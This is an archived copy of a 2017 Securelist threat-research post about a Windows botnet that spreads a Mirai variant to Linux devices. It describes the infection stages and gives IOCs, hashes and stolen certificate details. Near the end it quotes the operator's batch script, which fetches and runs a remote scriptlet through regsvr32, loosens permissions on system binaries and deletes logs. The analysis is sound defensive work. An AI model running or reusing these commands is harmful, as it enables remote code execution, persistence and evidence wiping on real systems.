{
	"id": "86fe2443-1bad-416e-92ab-a012a1907c70",
	"created_at": "2026-04-06T00:20:08.581839Z",
	"updated_at": "2026-04-10T13:11:33.820675Z",
	"deleted_at": null,
	"sha1_hash": "3715f938027226f626ac630ade6d976f60b1e172",
	"title": "New(ish) Mirai Spreader Poses New Risks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 288667,
	"plain_text": "New(ish) Mirai Spreader Poses New Risks\r\nBy GReAT\r\nPublished: 2017-02-21 · Archived: 2026-04-05 14:58:13 UTC\r\nA cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly.\r\nHowever, there is much information confused together, as if an entirely new IoT bot is spreading to and from\r\nWindows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet\r\nis spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.\r\nThe earliest we observed this spreader variant pushing Mirai downloaders was January 2017. But this Windows\r\nbot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai\r\nbots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t\r\nhave a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a\r\nnew threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously\r\nunavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they\r\ncan be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center\r\nsoftware, and other internal devices.\r\nSo, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very\r\nlimited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web\r\nresources and servers. These servers help provide a better timeline of operation for the operator. One of the\r\ndirectly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And\r\nmost of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest\r\ncode or most impressive leap.\r\nRegardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows\r\nplatform. Much like the Zeus banking trojan source code release that brought years of problems for the online\r\ncommunity, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure\r\nfor years to come, and this is just a minor start.\r\nNotably, the 2016 Mirai operations were unique for two reasons:\r\nnewly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers)\r\non a large scale\r\nrecord setting DDoS traffic generation, exceeding all previous volumes\r\nThe great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and\r\nwas severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation\r\nstates’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of\r\nnation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the\r\nInternet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down\r\nwide swaths of the internet using this juvenile toolset? It’s very possible.\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 1 of 11\n\nIn response to the huge problem this poses to the internet infrastructure, over the past few months, our team and\r\nCERT have participated in multiple successful command and control takedown efforts that otherwise have posed\r\nproblems for partners simply providing notifications. While some security researchers may describe these\r\ntakedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And,\r\nwe are happy to partner with more network operators to leverage our connections with CERTs, LE, and other\r\npartners around the world to further enable this success.\r\nThe Windows Spreader – Who What Where\r\nThis Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading\r\ntechniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot\r\nexecutables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and\r\nchecks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux\r\nMirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a\r\ndownloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot.\r\nThese devices include\r\nIP-based cameras\r\nDVR\r\nMedia center appliances\r\nVarious Raspberry and Banana Pi\r\nUnfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly\r\none that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from\r\nstring artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in\r\nTaiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it\r\nis likely that this developer/operator is Chinese speaking.\r\nThe addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability\r\nto rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world,\r\nand the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the\r\njuvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and\r\nnetwork for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source\r\nis publicly available.\r\nBelow is a proportional comparison of the second stage component’s IP geolocations\r\n(fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is\r\nserved from one of two web hosts, both hosted in Taiwan :\r\nhttp://down.mykings[.]pw:8888/ups.rar\r\nhttp://up.mykings[.]pw:8888/ups.rar\r\nWhen downloaded, it is copied to disk with one of several filenames and executed:\r\ncab.exe, ms.exe, cftmon.exe\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 2 of 11\n\nClearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.\r\nComponents\r\nThe bot code and various components have been pulled together from other projects and previous sources. At\r\nruntime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading\r\nadditional configuration files, fetching further instruction, and downloading and running additional executable\r\ncode. Again, mostly all of these components, techniques, and functionality are several years old and are very large\r\nfile objects.\r\nWindows Spreader Infection Process\r\ni.e. c:\\windows\\system\\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)\r\nChanges DNS settings to 114.114.114.114, 8.8.8.8.\r\ndownloads and executes\r\nfrom hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)\r\nhxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)\r\nDownloads\r\nhxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg\r\n(b27590a4b89d31dc0210c3158b82c175) to c:\\windows\\system\\msinfo.exe\r\n(5707f1e71da33a1ab9fe2796dbe3fc74)\r\nand runs with command line parameters “-create” “-run”\r\nDownloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)\r\nThis file is a command shell script that registers a variety of files, including database connectivity libraries, and\r\ncleans up unneeded traces of itself on the system.\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 3 of 11\n\nhttp://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)\r\nIt copies itself to the tasks directory, and installs itself as a scheduled job.\r\nc:\\windows\\system\\my1.bat\r\nc:\\windows\\tasks\\my1.job\r\nc:\\windows\\system\\upslist.txt\r\nc:\\windows\\system32\\cmd.exe /c sc start xWinWpdSrv\u0026ping 127.0.0.1 -n 6 \u0026\u0026 del\r\nc:\\windows\\system\\msinfo.exe \u003e\u003e NUL\r\nc:\\program files\\kugou2010\\ms.exe (10164584800228de0003a37be3a61c4d)\r\nKeylogger (hosted as comments within jpeg files)\r\nThis botnet operator hosts components embedded within jpeg comments, a technique they have been using since\r\n2013. These techniques provide very large file objects. So, even a fresh image downloaded by this bot of Taylor\r\nSwift contains 2.3mb of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 4 of 11\n\nModular bot code\r\nAlso interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (sql injection)\r\nand brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various\r\nattacks. The bots are instructed on individual tasks per an encrypted file downloaded from the available c2.\r\n[Cracker:IPC]\r\n[Cracker:MSSQL]\r\n[Cracker:MySQL]\r\n[Cracker:RDP]\r\n[Cracker:SSH]\r\n[Cracker:RDP]\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 5 of 11\n\n[Cracker:Telnet]\r\n[Cracker:WMI]\r\nThe Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken\r\nout across source libraries:\r\nCheckUpdate.cpp\r\nCracker_Inline.cpp\r\nCracker_Standalone.cpp\r\ncService.cpp\r\nCThreadPool.cpp\r\nDb_Mysql.cpp\r\nDispatcher.cpp\r\nIpFetcher.cpp\r\nlibtelnet.cpp\r\nLogger_Stdout.cpp\r\nScanner_Tcp_Connect.cpp\r\nScanner_Tcp_Raw.cpp\r\nServerAgent.cpp\r\nTask_Crack_Ipc.cpp\r\nTask_Crack_Mssql.cpp\r\nTask_Crack_Mysql.cpp\r\nTask_Crack_Rdp.cpp\r\nTask_Crack_Ssh.cpp\r\nTask_Crack_Telnet.cpp\r\nTask_Crack_Wmi.cpp\r\nTask_Scan.cpp\r\nWPD.cpp\r\ncatdbsvc.cpp\r\ncatadnew.cpp\r\ncatdbcli.cpp\r\nwaitsvc.cpp\r\nerrlog.cpp\r\nCode signing certificates\r\nThe code signing certificates appear to be stolen from a solar and semiconductor grinding wafer products\r\nmanufacturer in Northwest China, and an expired one.\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 6 of 11\n\nKaspersky Lab products detect and prevent infections from these bots.\r\nFile object scan verdicts\r\nTrojan.Win32.SelfDel.ehlq\r\nTrojan.Win32.Agent.ikad\r\nTrojan.Win32.Agentb.btlt\r\nTrojan.Win32.Agentb.budb\r\nTrojan.Win32.Zapchast.ajbs\r\nTrojan.BAT.Starter.hj\r\nTrojan-PSW.Win32.Agent.lsmj\r\nTrojan-Downloader.Win32.Agent.hesn\r\nTrojan-Downloader.Win32.Agent.silgjn\r\nHEUR:Trojan-Downloader.Linux.Gafgyt.b\r\nBackdoor.Win32.Agent.dpeu\r\nDangerousPattern.Multi.Generic (UDS)\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 7 of 11\n\nBehavioral verdicts\r\nTrojan.Win32.Generic\r\nTrojan.Win32.Bazon.a\r\nTrojan.Win32.Truebadur.a\r\nDangerousObject.Multi.Chupitio.a\r\nAppendix\r\nc2 and url\r\nhttp://dwon.f321y[.]com:280/mysql.exe\r\nhttp://downs.f4321y[.]com:280/psa.jpg\r\nhttps://down2.b5w91[.]com:8443\r\nhttp://down.f4321y[.]com:8888/kill.html\r\nhttp://down.f4321y[.]com:8888/test.html\r\nhttp://down.f4321y[.]com:8888/ups.rar\r\nhttp://67.229.225.20\r\nhttp://down.f4321y[.]com\r\nhttp://up.f4321y[.]com\r\nhttp://up.f4321y[.]com:8888/ver.txt\r\nhttp://up.f4321y[.]com:8888/ups.rar\r\nhttp://up.f4321y[.]com:8888/update.txt\r\nhttp://up.f4321y[.]com:8888/wpdmd5.txt\r\nhttp://up.f4321y[.]com:8888/wpd.dat\r\nhttp://down.F4321Y[.]com:8888/my1.html\r\nhttp://up.mykings[.]pw:8888/ver.txt\r\nhttp://up.mykings[.]pw:8888/ups.rar\r\nhttp://up.mykings[.]pw:8888/update.txt\r\nhttp://up.mykings[.]pw:8888/wpdmd5.txt\r\nhttp://up.mykings[.]pw:8888/wpd.dat\r\nhttp://down.mykings[.]pw:8888/my1.html\r\nhttp://down.mykings[.]pw:8888/ups.rar\r\nhttp://down.mykings[.]pw:8888/item.dat\r\nhttp://js.f4321y[.]com:280/v.sct\r\nhttp://down.b591[.]com:8888/ups.exe\r\nhttp://down.b591[.]com:8888/ups.rar\r\nhttp://down2.b591[.]com:8888/ups.rar\r\nhttp://down2.b591[.]com:8888/wpd.dat\r\nhttp://down2.b591[.]com:8888/wpdmd5.txt\r\nhttp://down2.b591[.]com:8888/ver.txt\r\nhttp://up.f4321y[.]com:8888/ups.rar\r\nhttp://ww3.sinaimg[.]cn/mw690/717a8b4dgw1f99ly7blarj20c40e4b2a.jpg\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 8 of 11\n\nhttp://img1.timeface[.]cn/times/a4c7eb57bb7192a226ac0fb6a80f2164.jpg\r\nhttp://downs.b591[.]com:280/ppsa.jpg\r\nhttp://down.b591[.]com:8888/test.html\r\nhttp://downs.b591[.]com:280/pps.jpg\r\nhttp://dwon.kill1234[.]com:280/cao.exe\r\nhttp://down.b591[.]com:8888/ups.rar\r\nhttp://down.b591[.]com:8888/ups.exe\r\nhttp://down.b591[.]com:8888/cab.rar\r\nhttp://down.b591[.]com:8888/cacls.rar\r\nhttp://down.b591[.]com:8888/kill.html\r\nCertificates\r\nXi’ an JingTech electronic Technology Co.,LTD\r\nsn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36\r\nPartner Tech(Shanghai)Co.,Ltd\r\nsn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89\r\nMd5\r\ne7761db0f63bc09cf5e4193fd6926c5e\r\nc88ece9a379f4a714afaf5b8615fc66c\r\n91a12a4cf437589ba70b1687f5acad19\r\na3c09c2c3216a3a24dce18fd60a5ffc2\r\n297d1980ce171ddaeb7002bc020fe6b6\r\n5707f1e71da33a1ab9fe2796dbe3fc74\r\na4c7eb57bb7192a226ac0fb6a80f2164\r\n64f0f4b45626e855b92a4764de62411b\r\n02b0021e6cd5f82b8340ad37edc742a0\r\n10164584800228de0003a37be3a61c4d\r\nfd7f188b853d5eef3760228159698fd8\r\ncbe2648663ff1d548e036cbe4351be39\r\nfb7b79e9337565965303c159f399f41b\r\neb814d4e8473e75dcbb4b6c5ab1fa95b\r\n04eb90800dff297e74ba7b81630eb5f7\r\n508f53df8840f40296434dfb36087a17\r\n93ccd8225c8695cade5535726b0dd0b6\r\n62270a12707a4dcf1865ba766aeda9bc\r\n43e7580e15152b67112d3dad71c247ec\r\n0779a417e2bc6bfac28f4fb79293ec34\r\nac8d3581841b8c924a76e7e0d5fced8d\r\ncf1ba0472eed104bdf03a1712b3b8e3d\r\n4eee4cd06367b9eac405870ea2fd2094\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 9 of 11\n\n21d291a8027e6de5095f033d594685d0\r\n097d32a1dc4f8ca19a255c401c5ab2b6\r\n5950dfc2f350587a7e88fa012b3f8d92\r\n2d411f5f92984a95d4c93c5873d9ae00\r\n9a83639881c1a707d8bbd70f871004a0\r\n5cae130b4ee424ba9d9fa62cf1218679\r\n2346135f2794de4734b9d9a27dc850e1\r\nfe7d9bdbf6f314b471f89f17b35bfbcd\r\nc289c15d0f7e694382a7e0a2dc8bdfd8\r\n9098e520c4c1255299a2512e5e1135ba\r\ndb2a34ac873177b297208719fad97ffa\r\ndefff110df48eb72c16ce88ffb3b2207\r\nc289c15d0f7e694382a7e0a2dc8bdfd8\r\nc75bd297b87d71c8c73e6e27348c67d5\r\n5af3bab901735575d5d0958921174b17\r\n1a6fea56dc4ee1c445054e6bc208ce4f\r\nae173e8562f6babacb8e09d0d6c29276\r\nad0496f544762a95af11f9314e434e94\r\nContents of http://down.mykings[.]pw:8888/my1.html\r\n@echo off\r\nmode con: cols=13 lines=1\r\nif exist C:\\downs\\runs.exe start C:\\downs\\runs.exe\r\nmd C:\\Progra~1\\shengda\r\nmd C:\\Progra~1\\kugou2010\r\nmd C:\\download\r\nregsvr32 /s shell32.dll\r\nregsvr32 /s WSHom.Ocx\r\nregsvr32 /s scrrun.dll\r\nregsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll\r\nregsvr32 /s jscript.dll\r\nregsvr32 /s vbscript.dll\r\nstart regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll\r\nattrib +s +h C:\\Progra~1\\shengda\r\nattrib +s +h C:\\Progra~1\\kugou2010\r\nattrib +s +h C:\\download\r\ncacls cmd.exe /e /g system:f\r\ncacls cmd.exe /e /g everyone:f\r\ncacls ftp.exe /e /g system:f\r\ncacls ftp.exe /e /g everyone:f\r\ncacls c:\\windows\\help\\akpls.exe /e /g system:f\r\ncacls c:\\windows\\help\\akpls.exe /e /g everyone:f\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 10 of 11\n\ncacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g system:f\r\ncacls C:\\Progra~1\\Common~1\\System\\ado\\msado15.dll /e /g everyone:f\r\nreg delete “HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” /v shell /f\r\ndel c:\\windows\\system32\\wbem\\se.bat\r\ndel c:\\windows\\system32\\wbem\\12345.bat\r\ndel c:\\windows\\system32\\wbem\\123456.bat\r\ndel c:\\windows\\system32\\wbem\\1234.bat\r\ndel c:\\windows\\system32\\*.log\r\ndel %0\r\nexit\r\nContents of http://up.mykings[.]pw:8888/update.txt\r\nhttp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\\windows\\system\\msinfo.exe\r\nhttp://down.mykings[.]pw:8888/my1.html c:\\windows\\system\\my1.bat\r\nRelevant Links\r\nhttps://malwaremusings.com/2013/04/10/a-look-at-some-ms-sql-attacks-overview/\r\nhttps://isc.sans.edu/diary/21543\r\nhttp://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html?m=1\r\nhttps://securelist.com/blog/research/76954/is-mirai-really-as-black-as-its-being-painted/\r\nhttps://threatpost.com/mirai-fueled-iot-botnet-behind-ddos-attacks-on-dns-providers/121475/\r\nhttps://securelist.com/analysis/quarterly-malware-reports/77412/ddos-attacks-in-q4-2016/\r\nSource: https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nhttps://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/"
	],
	"report_names": [
		"newish-mirai-spreader-poses-new-risks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434808,
	"ts_updated_at": 1775826693,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.pdf",
		"text": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.txt",
		"img": "https://archive.orkl.eu/3715f938027226f626ac630ade6d976f60b1e172.jpg"
	}
}